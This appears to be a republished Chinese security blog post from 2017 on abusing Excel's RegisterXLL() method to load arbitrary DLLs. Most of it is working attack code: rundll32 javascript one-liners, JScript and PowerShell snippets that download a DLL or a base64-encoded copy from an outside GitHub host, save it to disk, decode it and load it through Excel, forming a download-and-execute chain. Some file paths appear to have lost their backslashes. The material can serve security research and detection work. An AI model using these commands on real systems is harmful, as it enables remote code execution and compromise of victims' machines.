本文讲的是
利用Excel.Application object’s RegisterXLL() method加载dll,
Ryan Hanson@ryHanson最近分享了一个技巧,利用
Excel.Application object's RegisterXLL()
能够加载dll。我对其分享的POC作了测试,接着做了扩展,添加功能实现远程下载执行,并且分析该方法相关的利用技巧,详细介绍脚本开发中的细节。
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:testmessagebox.dll');this.close();
var excel = new ActiveXObject("Excel.Application");excel.RegisterXLL("C:testmessagebox.dll");
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))$excel.RegisterXLL("C:testmessagebox.dll")
WScript.Echo("1");
WScript.Echo(WScript.CreateObject("WScript.Shell").Environment("USER")("TEMP"));
WScript.Echo(WScript.CreateObject("WScript.Shell").SpecialFolders("Recent");
WScript.Echo(WScript.CreateObject("WScript.Shell").SpecialFolders("Recent")+"msg.dll");
var FileSys = WScript.CreateObject("Scripting.FileSystemObject"); if (FileSys.FolderExists("c:Program FilesMicrosoft Office")) { WScript.Echo("[+] Find Microsoft Office."); }else{ WScript.Echo("[!] I can't find Microsoft Office!"); }
var sGet=new ActiveXObject("ADODB.Stream");var xGet=null;xGet=new ActiveXObject("Msxml2.XMLHTTP");xGet.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calc.dll",0);xGet.Send();sGet.Type=1;sGet.Open();sGet.Write(xGet.ResponseBody);sGet.SaveToFile((WScript.CreateObject("WScript.Shell").SpecialFolders("Recent")+"calc.dll"),2);
h=new ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calc.dll",false);h.Send();s=new ActiveXObject("ADODB.Stream");s.Type=1;s.Open();s.Write(h.ResponseBody);x=new ActiveXObject("WScript.Shell").SpecialFolders("Recent")+"calc.dll";s.SaveToFile(x,2);
FileSys = WScript.CreateObject("Scripting.FileSystemObject"); if (FileSys.FolderExists("c:Program FilesMicrosoft Office")) { WScript.Echo("[+] Find Microsoft Office."); WScript.Echo("[+] Download file..."); h=new ActiveXObject("WinHttp.WinHttpRequest.5.1"); h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calc.dll",false); h.Send(); s=new ActiveXObject("ADODB.Stream"); s.Type=1; s.Open(); s.Write(h.ResponseBody); x=new ActiveXObject("WScript.Shell").SpecialFolders("Recent")+"calc.dll"; s.SaveToFile(x,2); WScript.Echo("[+] Download Success."); WScript.Echo("[+] Load dll..."); e= new ActiveXObject("Excel.Application"); e.RegisterXLL(x); WScript.Echo("[+] Load dll Success."); }else{ WScript.Echo("[!] I can't find Microsoft Office!"); }
$path=$env:APPDATA+"MicrosoftWindowsRecentcalc.dll"$client = new-object System.Net.WebClient$client.DownloadFile('https://raw.githubusercontent.com/3gstudent/test/master/calc.dll', $path)$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))$excel.RegisterXLL($path)
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calc.dll",false);h.Send();s=new%20ActiveXObject("ADODB.Stream");s.Type=1;s.Open();s.Write(h.ResponseBody);x=new%20ActiveXObject("WScript.Shell").SpecialFolders("Recent")+"calc.dll";s.SaveToFile(x,2);
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/version.txt",false);h.Send();s=new%20ActiveXObject("Scripting.FileSystemObject");f=s.CreateTextFile("c:test1.txt",true);f.WriteLine(h.ResponseText);f.Close();
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calc.dll",false);h.Send();s=new%20ActiveXObject("Scripting.FileSystemObject");f=s.CreateTextFile("c:test1.txt",true);f.WriteLine(h.ResponseText);f.Close();
$fileContent = [System.IO.File]::ReadAllBytes('calc.dll')$fileContentEncoded = [System.Convert]::ToBase64String($fileContent)| set-content ("buffer.txt")
h=new ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calcbase64.txt",false);h.Send();fso1=new ActiveXObject("Scripting.FileSystemObject");f=fso1.CreateTextFile("c:test1.txt",true);f.WriteLine(h.ResponseText);f.Close();
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calcbase64.txt",false);h.Send();s=new%20ActiveXObject("Scripting.FileSystemObject");f=s.CreateTextFile("c:test1.txt",true);f.WriteLine(h.ResponseText);f.Close();
x="c:testcalc.dll";h=new ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","https://raw.githubusercontent.com/3gstudent/test/master/calcbase64.txt",false);h.Send();var enc = new ActiveXObject("System.Text.ASCIIEncoding");var length = enc.GetByteCount_2(h.ResponseText);var ba = enc.GetBytes_4(h.ResponseText);var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");ba = transform.TransformFinalBlock(ba, 0, length);s=new ActiveXObject("ADODB.Stream");s.Type=1;s.Open();s.Write(ba); s.SaveToFile(x,2);new ActiveXObject("Excel.Application").RegisterXLL(x);
$FilePath="C:testtest1.dll"$base64Buf = Get-content c:test1.txt$fileContentBytes = [System.Convert]::FromBase64String($base64Buf) [System.IO.File]::WriteAllBytes($FilePath,$fileContentBytes)$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application"))$excel.RegisterXLL($FilePath)
原文发布时间为:2017年7月24日
本文作者:3gstudent
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。